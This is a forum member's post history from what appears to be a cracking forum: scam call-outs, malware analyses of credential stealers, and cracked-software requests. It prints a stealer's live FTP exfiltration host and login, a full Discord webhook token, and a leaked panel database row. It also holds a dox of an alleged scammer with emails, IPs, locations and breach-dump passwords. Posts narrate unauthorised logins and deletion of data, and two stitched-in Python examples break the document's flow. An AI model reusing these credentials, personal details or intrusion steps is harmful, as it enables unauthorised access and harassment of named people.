

ObbedCode's Content

There have been 34 items by ObbedCode (Search limited from Apr 28, 2023)



#44045439 Looking for Cybersole / AIO Download Latest

Posted by ObbedCode on 05 October 2023 - 02:50 AM in Cracked Programs

Download to the Latest version of the Software, No I didnt purchase it so I would not be able to "ask"

No Trades/buying just give me the Link not making Promises of Cracking it just checking it out.

 

Discord: ObbedCode

Telegram: ObbedCode

 

Or Msg me on here (preferred)




#44029435 Paul Zhielo [Scammer] [Android] [AppCloner]

Posted by ObbedCode on 03 October 2023 - 12:43 PM in The Lounge

Paul Zhielo (Scammer)

 

Pastebin for the Raw Text and Images:

https://pastebin.com/kNBh4ixy

 

Now this User is not on Nulled (I don't think so) but more so this is an Outlet for me to Post Stuff, so here it is

My interesting Year Journey of Paul and His AppCloner Scams

My Android Reverse Side of me I do ...

 

So before we start, yes he is a scammer, no there is no one pretending to be him, it's just him. He's a poor kid from a poor country and in all honesty doesn't know how to code.
He also barely knows how to crack; I assume (assume) he just hired someone to help him or just to crack anything he needs. His coding skills, I will say, show he can't code.

Let's start. It started when I would scrape the Internet for any AppCloner Cracks. If you don't know AppCloner, think of it as an App to Clone other Apps but on Steroids.
It does more than just Clone, it Hooks, allows you to Modify the App to your liking. There is way too much to type so go to the URL to check it out for yourself.

(Ultra+ Donation is 2400$ :x big money man)


https://appcloner.app/

 

I would find some, most old or just click-bait / fake google SEO stuff. Then a version floats around as "2.7.x" , there were already "1.5x" cracks but they are too old.
Each new update with App Cloner is always big (++ app).
It would be Cracked by a Person Named "Paul Zhielo" , at one point It possibly had a Login Panel on it (PHP Server) but it used weak protection making it easy to Crack the Crack.
It got leaked , then Rumor of version "2.9.x" was Floating also Made by Him.

Paul Typically hung around Telegram.

 

Usernames:
"PauLZhieLo"
"Javacode002" (PZ)
Chats:
"Javacode002" (PZ CHANNEL)
"PauLGroupChat"
"PauLModz_VIP" (PauLModz)

 

So for a while I respected him / his skill, then came the scams... So understanding new versions of App Cloner were out with NEW COOL FEATURES
I would not mind a NEW Cracked Version ... I tried myself to bypass the Stack Decryption and did it, some other things but nothing Crazy.
So a new Message from Paul (both accounts always) came out that he has a (2.10.x) Crack. It was around 45$ if I am not wrong, and well I wanted it.


I messaged him on "PauLZhieLo" and he said:

"send on [email protected] make screenshots after i verified i will send your latest appcloner mod"

 


 

The name on the PayPal is "Paolo Manahan" now has the App Cloner Logo as the Profile

 

So I did, and well he sent, but with a twist: it was a rebrand of an already free cracked version.
I have a Fake Paypal to Help Charge Back on Scams assuming not Family n Friends, but I missed that step (oops) so I got Scammed ...
 

Moving on I assumed he eventually died out, but he didn't, he just used another account, claimed the other guy was scamming, that it isn't him...
(despite him still using the same BTC Address)

(despite him mixing both accounts in similar chats / merging them as if he is one person) bUt No ThE oThEr PeRsOn Is ScAmMiNg.

 

He now has AppCloner "2.16.x" Crack for sale ...

I download the new "2.16.x" apk From his Chat, Both Chats, his "Real" one and his "Scamming" one (they are both the same)
What's funny is when he Dropped "AppCloner_2.16.9Mod.apk" the File size is "62.1" mb, then he dropped "AppCloner_2.16.10Mod.apk" with also the same exact file size..
Nothing was changed, didn't even bother adding a few more bytes to the File, just changed the Version String / Number.

Maybe the "whatsnew_en.txt" in assets

 


Looking at the Apk, It has some Shit Login Menu, and is Protected with "Jiagu 360", a Chinese Protection that does "dex2c", Converting the Dex Files into C Code ".so"
I looked at the APK Under a Tool called "NP Manager", an APK Tool / Editing Tool for Android (Not for the PC); yes Dex editing / APK Modding can all be done via Phone.
Looking at the "assets" folder in the APK I see many Things, a bunch of "lib.so" files mainly for the "360" Protection.
A lot of interesting ones, but looking at the "whatsnew_en.txt" it does show that it is the "updated" AppCloner based off of what's new; but looking, it also has the AppCloner "2.16.x" APK in the Assets Folder

So the AppCloner Apk in the AppCloner Apk
So that didn't make sense... Maybe it Unpacks the APK then Hooks to Bypass Login ? who knows, only way to know is to Dump.

 


 

Dumping the "Jiagu 360" Protected Dex's then Rebuilding will Produce the Unprotected APK.

File went from "62" mb to "170" mb when Dumping, so AppCloner "1.5.x" ? Code with the AppCloner "2.16.x" APK in the Assets Folder .. Kek
Now we get the Truth. Talking to AppListo (dev of appcloner), the new Updated APK in the "CloneSettings" Class Should have Fields that have the String "Snow" in them, as the new "2.16.x" versions now Have a Snow Theme for the Holidays.
It didn't; matter of fact it was missing A LOT of settings that would be in any version of AppCloner "2.X" .. and the APK that is "2.16" is in there but seems to not be used at all, more something to throw people like me off
Assuming nothing is going past the "360" Protection.

Well I have issues so ofc I can't stop til I know the truth. The "Auth" is easy to Bypass, it's just a Pile of Shit. Let's pretend we didn't Unpack it, let's get into Part 2.

 


 

The Panel

 

Decoding a Base64 String in the APK Gave me the Login Site => https://paulzhielo.0...p.com/login.php

 


 

 

So I messaged his new account "Javacode002" acting as if I am a potential buyer (I'm not)


I play dumb act as if I want to purchase he says:

"Send 2200 php if single device and 2800 php if you want multiple devices, send on [email protected] send via friends and family so the balance will not become onhold"

 


 

I said Send proof he sends Pictures of (old buys as well as people he scammed) and a Video of the AppCloner mod BUT

in the Video the Settings "Identity & tracking options" says "0 of 16" , so it has a total of "16" options
Ummmm ... "2.16.x" should have at least "20" options ... so he could not even match the video up with what he is scamming with ..

How sad, remember "Javacode002" Sent ME that Video HE DID not a Scammer HE DID.

 


 

This time around the PayPal I used is Banned so I can't send, but I want a way in (without cracking / tampering, a legit way)...
While doing some Digging online I found: (He Replied to this Thread)

"https://platinmods.c...zhielo.2219124/" and what was Interesting => https://platinmods.c...0/#post-2233218


Hmm I wonder how he made his Login Menu, did he change a lot ? no. did he make it ? no. ofc ... he scams.. he can't code .. :< he just copy-pasted code

Passing this part off to my buddy, let's call him "Z"; he Rips this Site apart, He dumps the DBs as well as the Login to the Main Panel: https://paulzhielo.0...erification.php

 


 

(It's ez tbh, should have been Brute Forced):


Database: id16009052_mypannel
Table: usuarios
[1 entry]
+------------+----------------------------------+
| login      | senha                            |
+------------+----------------------------------+
| paulzhielo | 81dc9bdb52d04dc20036dbd8313ed055 |  <- Hashed password is "1234"
+------------+----------------------------------+

 


 

 

I log in to the Panel and well there it is all, every account. I don't think it's for AppCloner but more so Mixed with his other services, as most don't work for AppCloner
To my understanding he would not give logins, just bailed once he was paid. Sometimes Just an APK, no Login (Fake Version)

Or He would make you a Login on the Go.

 

I tried logging into many; the one that worked ez was "PauLZhieLo" "1234" .. wow we could have all just logged in with this from the start .... oh well
So now I delete all of his Users, bye bye.


 

 

Scam Proof:
 (t.me/windowsundandroid) => https://imgur.com/a/VNErz0u
 (Ressy) => https://imgur.com/a/g5xYB2D
 (Alexa/Etc) => https://imgur.com/a/x19e0oW
 (Second Attempt w Me) => https://imgur.com/a/6p9GPId

Pauly: => https://imgur.com/a/5LlfuFW

Pauly v2 => https://imgur.com/a/xDRsJYi


 

Rest of Images:
 https://imgur.com/a/6p9GPId
 https://imgur.com/a/X0Hlyhp
 https://imgur.com/a/FdQVcHg

 

Downloads:
 (All Images) => https://wormhole.app...1UJsyaBEaPFy3jQ
 (Killed APK) => https://wormhole.app...QHQQHaqWpGuJrWg

 

Moral of the story, Don't Scam, Don't be a Skid and Scam

Don't Copy Pasta Code (Skiiiddd) (Paul that's you)

Don't act like we are dumb ("Im NoT sCaMmInG tHaTs ThE oThEr DudE nOt Me")

Stop being Poor Paul , we get it you do things because you live in a Mud Hut but there has to be better ways of Making Money

Also Don't use weak passwords you fucking skid

I here working the corner Kissing Dudes Makes you money <3

 

This is my Compiled Information I have:


[email protected]
[email protected] => (Paolo Manahan)
[email protected] => (Paolo Manahan)
https://ph.linkedin....hielo-836ab71b9 => Paul Zhielo , Modder at Reverse Enginering, Camalig, Bicol Region, Philippines (Peopledatalabs came up with nothing)
https://www.facebook...D13Kn9TLStLRvl/
https://m.facebook.c...1/?locale=hi_IN
https://platinmods.c...zhielo.2219124/

[Telegram]
Javacoding11
Javacode002
PauLZhieLo

[Dumps] (Some may not be him but possible hits, take with a grain of salt)


[Twitter]
Username: paolomanahan
Email: [email protected]
Name: paolo manahan
Created: Thu Oct 20 11:15:04 +0000 2011
Followers: 1

[Wattpad]
Username: jokring123
Email: [email protected]

Lastip: 122.2.113.3
As: AS9299 Philippine Long Distance Telephone Company
City: Manila
Country: Philippines
CountryCode: PH
Isp: Philippine Long Distance Telephone Co.
Lat: 14.5833
Lon: 120.9667
Org: Philippine Long Distance Telephone Company
Region: 00
RegionName: Metro Manila
Timezone: Asia/Manila
Zip: 1018

Hash: $2y$10$0wQ7fWE3Fq3CQvLt2Usmbe8yPZ7ChjUjsrhgeir2K4A8Ri79Haore
Hash not found!
Name: jokring123

[Wattpad]
Username: PaoloManahan0
Email: [email protected]

Lastip: 112.198.98.175
As: AS4775 Globe Telecoms
City: Lahug
Country: Philippines
CountryCode: PH
Isp: Globe Telecom
Lat: 10.3387
Lon: 123.8998
Region: 07
RegionName: Central Visayas
Timezone: Asia/Manila
Zip: 6000

Name: Paolo Manahan

[CLIXSENSE]
Username: arcticorange
Email: [email protected]
Password: arctic
Name: Paolo Manahan
City: Valenzuela
Country: PH
Zip: 1440
Gender: male
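An added example (mine, not code from the post or from the panel) that audits the two storage formats this post surfaced: the bare MD5 in the panel table, which the post says is the hash of "1234", and the bcrypt-format hash ($2y$10$...) that the lookup reported as not found. It checks the page's MD5 against that value, triages a dumped hash column by format, and stores and verifies a password with salted PBKDF2 instead; the classify/hash/verify functions and the PBKDF2 parameters are this example's own choices, not anything the panel does.

```python
"""Audit the password-storage formats seen in this post and show the hardened
alternative. PAGE_MD5 is the hash shown in the panel table on the page; the
bcrypt prefix is the format (not the value) of the "Hash not found!" line.
Everything else is this example's own code, not the panel's.
"""
import hashlib
import hmac
import os
import re

PAGE_MD5 = "81dc9bdb52d04dc20036dbd8313ed055"  # from the page; MD5("1234")


def classify_hash(stored: str) -> str:
    """Rough format triage for a dumped credential column."""
    if re.fullmatch(r"[0-9a-fA-F]{32}", stored):
        return "32-hex (md5-shaped, unsalted)"
    if stored.startswith(("$2a$", "$2b$", "$2y$")):
        return "bcrypt (salted, cost factor embedded)"
    if stored.startswith("pbkdf2-sha256$"):
        return "pbkdf2-sha256 (salted, iterated)"
    return "unknown"


def md5_matches(candidate: str, stored: str) -> bool:
    """One unsalted MD5 comparison: all the work the panel's scheme costs."""
    return hashlib.md5(candidate.encode("utf-8")).hexdigest() == stored.lower()


def hash_password(password: str, iterations: int = 600_000) -> str:
    """Salted PBKDF2-HMAC-SHA256; the 600k default follows current OWASP guidance.
    Output format (this example's own): pbkdf2-sha256$<iters>$<salt hex>$<dk hex>."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2-sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; constant-time compare."""
    try:
        algo, iters, salt_hex, dk_hex = stored.split("$")
        if algo != "pbkdf2-sha256":
            return False
        dk = hashlib.pbkdf2_hmac(
            "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iters)
        )
    except ValueError:
        return False
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print(classify_hash(PAGE_MD5), "-> '1234' matches:", md5_matches("1234", PAGE_MD5))
    stored = hash_password("1234")
    print(classify_hash(stored), "-> verify:", verify_password("1234", stored))
```

Two hashes of the same password differ because each call draws a fresh salt, so a precomputed table is useless against the stored column; the unsalted MD5 in the panel table needs no such table at all for a four-digit value.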




#43484460 PASTEHASTER | Shitty pastebin link generator (1.4k CPM | PROXIES)

Posted by ObbedCode on 08 August 2023 - 05:37 AM in Cracking Tools

Clean




#43484450 COMBO EDITOR | MORE THAN 33 MODULES

Posted by ObbedCode on 08 August 2023 - 05:36 AM in Cracking Tools

Clean




#41644502 Veltorz v1.0 - Free Valorant Check [HQ Capture, Proxy]

Posted by ObbedCode on 11 February 2023 - 07:55 AM in Cracking Tools

INFECTED INFECTED INFECTED INFECTED

INFECTED INFECTED INFECTED INFECTED

INFECTED INFECTED INFECTED INFECTED

 

~ Has an executable & Python File , can be an executor for the script but its not sadly :(




#41623594 SEPHORA CHECKER WITH CAPTURE (FAST CPM)

Posted by ObbedCode on 09 February 2023 - 04:36 AM in Cracking Tools

INFECTED INFECTED INFECTED INFECTED

INFECTED INFECTED INFECTED INFECTED

INFECTED INFECTED INFECTED INFECTED

 

~ Original File name "RuntimeBroker.exe"




#41594163 FTP Malware Server Bombing | Deleting 71 Victims Stolen Information | ObbedCo...

Posted by ObbedCode on 06 February 2023 - 07:46 AM in Reverse Engineering Guides and Tips

The best part about Malware Reverse Engineering is at Times you will Run Into Samples that require logging into some site to either access or store files.

 

The user: "Chessgoder" had a great idea to have a stealer that uploads stolen victim information to an FTP server

Not just that but..

 

to spread it on Nulled ? very risky I say for the server :(

 

Now I will take you on the Journey of me Reverse engineering Python Malware with FTP Login


 

 

Analyzing the first file I received from him, right away he gets it all wrong. It really pisses me off how sloppy these devs are ..

He has a .NET DLL as the dependency for his ".exe" file.

 

"Well Whats wrong with that ?"

The executable has nothing to do with .NET it was built / Compiled in "Python" "PyInstaller"

Python using .NET dependencies ? cmon you can do a lot better ...

To detect the Assembly Type we use this tool called "DIE" , "Detect it Easy":

 

https://horsicq.github.io/

https://github.com/h.../Detect-It-Easy

 

 

The sample I am analyzing is "Cracking-island", an AIO Cracking tool of some sort.

 

Specifically "[MULTI TOOL] CRACKING ISLAND ACCOUNTS, COMBOLISTS, PORN, TOOLS AND MORE."

 


 

To Unpack / Undo "Pyinstaller" we can use the GitHub tool: https://github.com/e.../pyinstxtractor

 


 

As you see it gives us possible entry points :D so we have somewhere to start looking. Before we do that let's analyze the dumped / extracted files.

Within these files we find another executable linked to it called "CrackingIsland.exe" (Seems to be the legit tool)

 


 

We also see the entry point files, since we want to see what happens when this program is launched. Now when I run it in Sandboxie it opens a powershell then quickly terminates itself .... hmm ...

We understand which ".pyc" files can be entry points given the output log of "pyinstxtractor"

[+] Possible entry point: pyiboot01_bootstrap.pyc
[+] Possible entry point: pyi_rth_inspect.pyc
[+] Possible entry point: contain.pyc

Before we can go snooping at these ".pyc" files: these files are not treated like text documents, so we can't just right-click, edit with Notepad++ and see the Python source code.

We will use another tool that converts Python Byte Code into Readable code for us :D

Another tool from Github: https://github.com/zrax/pycdc

 

Now building this file is difficult for Windows using the "CMake" / "Make" Commands; I am not advanced enough I suppose to get it working for Windows, at least without errors

So we start up our Linux Virtual Machine :D , specifically this installation / flavor is "Parrot OS"

We run our few "Make" Commands and it works like a charm, so let's start working with it.

We drag and drop the possible entry point Files into the VM Desktop, rename them so it's easy to write on the Shell / Terminal

I usually name them like "1.pyc" "o.pyc", does not matter, whatever makes it easier.

 

Command goes as: "./pycdc <FILE.PYC>"

 

The first file we de-compile is "pyiboot01_bootstrap.pyc"

It does not seem to have anything interesting so we then de-compile "pyi_rth_inspect.pyc" same thing .... hmm

Then the final file "contain.pyc" , it prints a lot onto the Terminal , too much , and it looks like Powershell ... ohh I think we might have a hit.

 


 

Now it's too much for the Terminal to output, so using "pycdc" we can add another argument to write the de-compiled data to an output file as such:

"./pycdc <TARGETFILE.PYC> -o <OUTPUTFILE.TXT>" we use the "-o" argument with a path following after; you don't need the "<>" brackets.

 


 

We then Copy this file over to our host machine to further analyze and look into it. Right away it's a shit ton of text compressed into one-ish line so we will have to "fix" / beautify it

I look for every "$" or "\n" or "{" and start it on a new line so now its all Multi Line.

 

First thing I notice it has "Anti VM" to make sure its not Executed in a Virtual Machine

 


 

The further we go , the more it reveals, it steals all your browser Passwords / History / Cookies , it takes Screenshots,

Even Downloads files from your Desktop / Downloads Folder, Steals Network Information / Passwords.

 


 

It just Keeps going :P and going until we see "ftp"

                    $w6PbopTSTweQdDrfj = \'ftp://191.96.63.85/victims/\' \n
                    $fTrjrdwSrfTrDwobj6 = \'u646124700\' \n
                    $ffwoDrwoTTfd6dworfS = \'Majorero2411\' \n

Address: "191.96.63.85"
Username: "u646124700"
Password: "Majorero2411"

 

So let's have fun :D , we will use "FileZilla" to login.
We get a successful connection <3

Right away the Directory that stores the stolen information is under "victims"; the namespace seems to be "chota.com" -> "public_html"

To be exact it has 71 Victims:

 


 

Now lets start downloading ... We will download all files for once because (I still have that left over black hat but mostly so I can contact the victims about their security)

Especially since one of them Owns a Company , Has a website with logins , Source code , Scripts for the Workers to say etc. Seems to be a company Computer...

To make it clear I have no mal intent , but to own a website / company and do naughty things on a computer that holds that data, well cmon ....

When we view the password Files, it seems to have Chinese text chars for random parts of the file; it can be the "Username" Field, "Password" Field, "URL" Field, it's Random

Seems it either failed at decrypting parts of the info, or improper encoding / decoding of the text.

If it failed to decrypt, that will be an issue as far as decrypting goes, as the "Master key" isn't actually really stored anywhere, and newer Chromium Based Browsers

Use AES-GCM Decryption that uses a master Password Located in the "Local State" File, that we don't have :(

If the Password that is Encrypted Starts with "v10" or "v11", that means it uses "AES-GCM", which will need a Master Password; you can use the C++ "BCrypt" API For that

Else you can use functions like:

https://learn.micros...ptunprotectdata

The C++ WinAPI Called "CryptUnprotectData" to Decrypt it

 

Hmm well lets see...

 


 

Out of curiosity I decided to throw the text document in "HXD", a Hex Editor, to possibly see if I can make sense of the Chinese Chars.

And well if we look at the portions where the Chinese Chars are supposed to be, it appears somewhat plain text, but enough to let us know it didn't fail to decrypt, it just failed at decoding / encoding.

HXD: https://mh-nexus.de/en/hxd/

 


 

So now lets make a tool to Decode the Text properly and Write it to a Text File.

Since we will heavily be using Buffers and Bytes and Encoding we will use ".NET/C#" since it's a safe and easy language

 

We need some way though to identify the Chinese Text Strings and/or Identify each string; I start looking in HXD after and before every Field that is Encoded with Chinese Chars

I notice they have Byte Patterns; the Byte Sequence is "0x0D, 0x00, 0x0D, 0x0A, 0x00"

 


 

Understanding Text , this looks to be in Unicode / aka using 2 Bytes from each Char so "55 00" would be Char "H"

I notice this "0A" Char a lot as well, I don't know what specific char that is as it appears in HXD as "."

I also Understand this Text Document has "\n" Chars, aka New Line char, to signify when data is on a New line

But what are the bytes for the Char "\n" ?

Hmmm.. how can we figure this out? (We can go into .NET and use:

BitConverter.ToString(Encoding.Unicode.GetBytes("\n"));

but instead we used our good old Friend "GPT"

We ask it:

"what is the byte code / value for "\n""

 

It Replies:

In ASCII encoding, the byte code/value for the newline character '\n' is 10 (in decimal). 
In hexadecimal representation, this value is 0x0A.

 

I had more context relating to C# for some CLR Questions , but specifically what we are looking for is the "Hexadecimal" Value of "\n"

Hexadecimal is a way to represent a number using the "Base16" System

 

Little about the "Base16" System

 

Most Humans use the "Base10" System: { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9 }

"Base16" Extends the representation of a number by using the Alphabet: { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, A, B, C, D, E, F }

it's a way we can represent Large numbers in the "Base10" System in a smaller looking number ? If that makes sense ? Binary aka Computers use the "Base2" System :ez:

Since our reset point is after "1" a Base2 Number can get large the bigger you increment , large length wise

(OK enough of the Base System, sorry I get lost sometimes in teaching :D , Base systems were something that took me a while to understand, learned years ago <3 )

 

 

Either following Before or After (Depending on if Little or Big Endian or LSB / MSB) byte 0x00 / 00 Will be its partner next to the actual byte "0A"

Given that it's Unicode it represents itself with Two Bytes of Data for each Char.

 

Now that we understand this we can essentially find that byte sequence: "0x0D, 0x00, 0x0D, 0x0A, 0x00"

To Split at each new line of Data understanding that byte Sequence contains "0x0A" the "\n" Char and some other Bytes that appear before

From there each Line , we will get the bytes Read Unicode from it, Add it to a List of Strings and Re Write the Text to a new Document and we shall be good :D

 

Now before you say anything, yes there is probably software out there to help with my issue

Notepad++ didn't seem to work, but I am also more of a do-it-myself person, I just prefer doing it myself.

Also yes the code can be optimized a lot more, sped up more, cleaned more, even made to be safer, but if it works, it works for now :D

 

So lets See the Code:

 


 

Now when we drag and drop the Text File into the Program to Fix up, the output for the Console looks like:

 


 

We open the Text Document, and Boom it's Fixed :D so happy now and so proud

 


 

So now we will Nuke the Server by Deleting all the Contents on it, Attempt to Shut it down (I don't think I can do that from my end :( )

Spread the credentials to render the access invalid since it is now public and everyone has access to the server and is aware of it.

Leave a little Note in the FTP Server ;) let them know I was there

Also contact any of the victims about security and they may have been compromised

Also a lot do seem to be analysis machines as their "Anti-VM" / "Anti Analysis" Method is really weak

 

RIP:


 

 

IMAGES:

https://imgur.com/a/lbSVbzN

 

SCANS:

 

 

 

 

As always stay safe out there guys , always run programs in a Sandbox or a VM !!
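The text-repair step described in the post above, as an added example in Python (my code, not the C# tool the author wrote, which is not on the page). It builds a constructed dump where one field was written as raw bytes inside an otherwise UTF-16LE file, shows that decoding it all as UTF-16LE turns pairs of ASCII bytes into CJK code units (the "Chinese chars" seen in the hex editor), and repairs it by walking bytes rather than code units, splitting lines on the UTF-16LE CRLF sequence. The sample content, the byte-pairing heuristic and the function names are this example's assumptions.

```python
"""Repair a text dump that mixes UTF-16LE lines with raw single-byte fields.

When a file is mostly UTF-16LE but some fields were written as raw ASCII
bytes, a viewer that decodes everything as UTF-16LE pairs adjacent ASCII
bytes into one code unit each, most of which land in the CJK block; an
odd-length raw field then shifts every later code unit by one byte. The
repair below walks the bytes instead of the code units.

All input here is constructed for the example; no real dump is used.
"""

CRLF_UTF16 = "\r\n".encode("utf-16-le")  # b"\r\x00\n\x00": the UTF-16LE line break


def build_mixed_dump() -> bytes:
    """Construct a sample dump (test data, not a real capture)."""
    good = "URL: https://example.test/login\r\n".encode("utf-16-le")
    # The "User: " label is UTF-16LE, but the value was appended as raw bytes
    # (5 bytes, so everything after it is misaligned for a UTF-16LE reader).
    mixed = "User: ".encode("utf-16-le") + b"alice" + CRLF_UTF16
    tail = "Password: hunter2\r\n".encode("utf-16-le")
    return good + mixed + tail


def naive_decode(buf: bytes) -> str:
    """What a text viewer does: decode the whole file as UTF-16LE."""
    return buf.decode("utf-16-le", errors="replace")


def _printable(b: int) -> bool:
    return 0x20 <= b < 0x7F or b in (0x09, 0x0D, 0x0A)


def repair_line(raw: bytes) -> str:
    """Decode one line byte by byte, accepting both encodings as they come.

    A non-NUL byte followed by 0x00 is one UTF-16LE code unit (U+0001..U+00FF);
    any other printable byte is a raw single-byte character. This heuristic
    assumes ASCII/Latin-1 content, which is what such a dump holds.
    """
    out, i, n = [], 0, len(raw)
    while i < n:
        b = raw[i]
        if b != 0 and i + 1 < n and raw[i + 1] == 0:
            out.append(chr(b))        # UTF-16LE code unit
            i += 2
        elif _printable(b):
            out.append(chr(b))        # raw single-byte character
            i += 1
        else:
            if b != 0:
                out.append("\ufffd")  # byte we cannot place; keep a marker
            i += 1                    # stray NUL bytes are dropped
    return "".join(out)


def repair(buf: bytes) -> list[str]:
    """Split on the UTF-16LE CRLF byte sequence, then repair each line."""
    return [repair_line(line) for line in buf.split(CRLF_UTF16) if line]


def rewrite(src_path: str, dst_path: str) -> int:
    """Read a damaged dump, write the repaired lines as UTF-8, return line count."""
    with open(src_path, "rb") as f:
        lines = repair(f.read())
    with open(dst_path, "w", encoding="utf-8", newline="\n") as f:
        f.write("\n".join(lines) + "\n")
    return len(lines)


if __name__ == "__main__":
    dump = build_mixed_dump()
    print("naive :", naive_decode(dump))
    print("repair:", repair(dump))
```

Splitting on the 4-byte CRLF sequence before decoding is what re-synchronises after an odd-length raw field: each line starts aligned again, and inside a line the byte walker never assumes alignment at all.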




#41582454 RAPIDGATOR CHECKER By Shield

Posted by ObbedCode on 05 February 2023 - 04:22 AM in Cracking Tools

Scanning ...

 

 

"Costura" scared me for a second :o but he uses it to load other dependencies in , pretty cool use :D

Anti Debug Is interesting

 

 

++ Code :)

 

 

Clean 




#41114990 [LEAK] Flash X CRACKING PACKAGE ALL IN ONE | 2022

Posted by ObbedCode on 22 December 2022 - 03:01 AM in Cracked Programs

hmmm




#41013522 Discord Mirai Stealer Analysis | Too Good to be True ?

Posted by ObbedCode on 11 December 2022 - 09:22 PM in Cracked Programs

So Recently it has come to my attention a new service has appeared onto a Discord Server to Create a Stealer from a Bot in a Discord Server.

You start a Ticket and type in "/build <DISCORDWEBHOOK>" then it will upload a file to "https://gofile.io" using their API without a key.

Now in theory you build this and each victim that Runs it will have their Creds such as Browser Passwords and Discord Tokens and what not sent to that Web Hook.

 

Now it seems too good to be true ?

No Paywall ?

No Monthly Service Fee ?

FUD ?

Wow this is Amazing let me start using it NOW !!

 

Before we do that lets do some Analyzing :D
Now this is Made in ".GO" but the Executable just seems to be the Dropper to prep things.

It will drop a .DLL in your %AppData% Roaming Folder Called "stripelib.dll" as well with .DB Files with your Passwords.

Now to begin Dropping Files is not the way to Go :pepe: :ohgod:

But hey they are learning it seems.

In order to Execute the .DLL they use "rundll32.exe", which can silently execute DLLs on Disk

He uses the Param "threadFunc" if we look at the .DLL exports we Get a Function Called "threadFunc" so that's the Function they are executing.

 


 


 

So the first Stub I build has a webhook of "google.com" so I can separate web requests to make sure I'm not mixing up the Web requests.

The third one I build was a "cock.li" "Web Hook"

and the fourth one was a Valid Discord Web Hook, and here is My analysis.

 

So Running Versions 1 & 2 it Creates a Web Hook Request DESPITE me not using a Web Hook.

It's a Successful POST Request so it's not a disabled Web Hook Yet; as well, when you click it, it gets you the Webhook Info making it still Valid

Note these first few are on my ACTUAL Machine I Ran no Analysis Machines.

Now I did have it under control but it failed to grab all my passwords. It did Successfully Find my Discord token and Send it to a Web Hook?

How I didn't build it with a valid Web Hook?

Copying the URL the Web Hook Seems to be:

 

https://discord.com/...g6neko_c_Xthcpd

 

Going to the Web Hook the info of the Web Hook is:

https://discord.com/api/webhooks/1047134409901477949/z1uIKiYIeOstu5EwJTYIr8Cy2tBsJpu3H5omedTmFP9r-usz4kV5Eg6neko_c_Xthcpd

{"type": 1, "id": "1047134409901477949", "name": "Mirai", "avatar": "c835bed462f49c57e810d2c2c01ebc92", "channel_id": "967461371849629716", "guild_id": "350710523874246656", "application_id": null, "token": "z1uIKiYIeOstu5EwJTYIr8Cy2tBsJpu3H5omedTmFP9r-usz4kV5Eg6neko_c_Xthcpd"}

 

Now you notice no other Web Requests ?

Because those builds had Invalid Web Hooks.

Now I do have passwords saved on the machine but the malware seems to do a TERRIBLE job at grabbing Saved Browser Passwords.

They Dump Browser DB Files and Uploads it to: https://gofile.io


Now before you say "ShOw CoDe Or YoUr LyInG"

No.

This is the WEB Requests coming from YOUR File

We can Identify that because your file is the only ONLY thing Running with "rundll32.exe" so its easy to separate.

 

In theory once and if it does grab your passwords it will upload it and send it with the Web Hook as well that you have no affiliation to.

I asked the Dev about this, he just throws Insults such as "N*gger" and "Skid" and his best excuse is "Its to Look at Virus Total Machines"

But if we look at the HTTP Request it Sends ALL information to that Web Hook.

Last I checked VT Machines don't use Discord ? and to Identify them You Don't need their Discord Token ?

Also my machine is not a VT Machine ? that excuse does not make sense at all because despite the machine type

It will send him the stolen Information no matter what.

Now yes to be fair these photos are from a VM. I did run it on my real machine to Confirm yet again it still does what I explained above.

 


 

I go on to Explain. Grabbing Virus Total Machine Names is useless. They use Generic Names, and often people can use Generic Names on their Computer.

He goes on to say he gets the HWID (but that's useless as they are hardened, so doing that will end up flagging nothing) but even in the HTTP Request as seen above,

Nowhere in the packet does it have my Machine Information or HWID ?

It seems he does not know how to properly identify analysis machines and likes to believe he has the skill to :(

 


 

Now lets move on. The Real Question is, Does it at least AT LEAST send the data to your Web Hook if you input a Valid Web Hook.

The answer is Yes , yes it does.

BUT

It still sends him the Data to his Web Hook as well....

 

So lets look at the HTTP Requests. Now we are still missing the one Web Request that Uploads to the File hosting website your Creds

That's because once again he uses a Shit method that is not stealthy by any means but hey that's the limit of his skill I suppose.


 

To Conclude this, this is enough to support and say it's sending him the stolen information as well. If you are ok with this then use the service as you please.

Do note it's not the stealthiest, though it is undetected for now, and it does not always grab browser passwords; nonetheless it's the attempt ?

On top of that this has nothing to do with the original "Mirai", it's a shit remake.

 

Also note his claim it is FUD (FULLY UNDETECTED) is always false, it at least gets noticed by a few AVs 3-5 at its prime.

 


 

It as well does not have auto start despite the claim ? I looked at all auto start entries possible nothing new ...

 


 

 

I can predict he will refute this by saying some excuse along the lines of "Its for VT Machines" or "Show Code"

Do this yourself, I showed the evidence; as I said, use this software if you are fine with terrible execution and/or sending stolen information back to the owner.

No point in bringing it up with him as he can't have a civilized conversation / argument and just throws insults, so I shall do the same.

 

So the argument "ShOw CoDe"

No. Not needed stop coping accept the facts as presented, and explain to your people you keep the information as well.

No one wants to Reverse engineer your Shit .GO malware if we can just look at the web requests.

It does have detections, it is NOT Fully FUD, but it is undetected, that I can give him.

How long ? I don't think long given his malware is pretty easy to spot and Identify given how it works.

His whole excuse for not showing the code is nothing more than a shit cope, and not releasing "source" code is not because

of detections but because of not wanting his customers to see the code where it sends the information.

I ran it on legit machines, hardened VMs you name it , it has the same behavior. 

Don't believe me ? do the test your self . Here are some samples I have made.

 

 

NEW UPDATE:

He has a forum as well; he stopped using "rundll32" and actually added startup :D

https://www.hybrid-a...80d9d23ab0fb4c5

https://www.virustot...da5d2/detection

 

So now also Malwarebytes, Microsoft , ESET, Google detects it no matter what.

That could be because of his shit startup Method.

Having those AVs detecting is as bad as it gets as everyone has Defender

People use Google, A lot of people use Malwarebytes.

He even started his own forum how cute <3

On top of that they no longer drop a .DLL, so the fewer dropped files the better; I see he's learning from his mistakes

 


 

Btw the webhook is now deleted , it took me time I just wanted to have fun first before I let it go

 

His Forum:

 


 

Even New Update:

 

He now Dropped .GO and made it worse now uses 'node.js' shitware

 

 

 

All Images:

https://imgur.com/a/vW2jH4R

https://imgur.com/a/oSKfsw3

https://imgur.com/a/cjILVgw

 

His Github:

https://github.com/W...CC/MiraiStealer

 

Scans:

 

Mirai.exe 1

https://www.virustot...8cb8b/detection

